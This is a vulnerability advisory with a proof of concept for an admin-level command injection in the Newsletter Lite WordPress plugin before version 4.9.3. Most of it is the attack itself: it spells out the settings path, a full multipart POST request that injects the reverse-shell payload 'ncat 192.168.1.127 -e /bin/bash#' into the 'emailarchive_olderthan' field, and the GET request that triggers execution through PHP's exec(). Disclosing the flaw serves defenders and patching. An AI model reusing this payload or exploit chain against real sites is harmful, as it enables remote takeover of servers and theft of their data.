Newsletter Lite < 4.9.3 - Admin+ Command Injection

Description The plugin does not properly escape user-controlled parameters when they are appended to SQL queries and shell commands, which could enable an administrator to run arbitrary commands on the server.

PoC

[1] Navigate to “Newsletters > Configuration > History & Emails Configuration” ====================== [2] Submit RCE Payload within “Archive Older Than” Field & Save Settings. The payload must be in HTTP parameter “emailarchive_olderthan” and escaped with backticks in format #, as shown below: POST /wp-admin/admin.php?page=newsletters-settings HTTP/1.1 Host: 192.168.178.130 Content-Length: 13688 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://192.168.178.130 Content-Type: multipart/form-data; boundary=----WebKitFormBoundary5lVCjZQhpa9vBS0n User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Referer: http://192.168.178.130/wp-admin/admin.php?page=newsletters-settings Accept-Encoding: gzip, deflate Accept-Language: en-GB,en-US;q=0.9,en;q=0.8 Cookie: – SNIP – Connection: close -- SNIP – ------WebKitFormBoundary5lVCjZQhpa9vBS0n Content-Disposition: form-data; name=“emailarchive_olderthan” ncat 192.168.1.127 -e /bin/bash# ------WebKitFormBoundary5lVCjZQhpa9vBS0n Content-Disposition: form-data; name=“theme_folder” default2 ------WebKitFormBoundary5lVCjZQhpa9vBS0n Content-Disposition: form-data; name=“loadstyles[]” newsletters-bootstrap ------WebKitFormBoundary5lVCjZQhpa9vBS0n Content-Disposition: form-data; name=“loadstyles_handles[newsletters-bootstrap]” -- SNIP – ====================== [3] Trigger the Payload by Navigating to Newsletters > Configuration > Scheduled Tasks > Email Archiving , then click “Run Now”. The below GET request will be issued: GET /wp-admin/admin.php?page=newsletters-settings-tasks&method;=runschedule&hook;=newsletters_emailarchivehook HTTP/1.1 Host: 192.168.178.130 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Referer: http://192.168.178.130/wp-admin/admin.php?page=newsletters-settings-tasks&amp;wpmlupdated;=true&amp;wpmlmessage;=Task+has+been+executed+successfully! Accept-Encoding: gzip, deflate Accept-Language: en-GB,en-US;q=0.9,en;q=0.8 Cookie: – SNIP – Connection: close ====================== [4] The user’s input will then be unsafely passed to PHP’s exec() function, resulting in arbitrary command execution.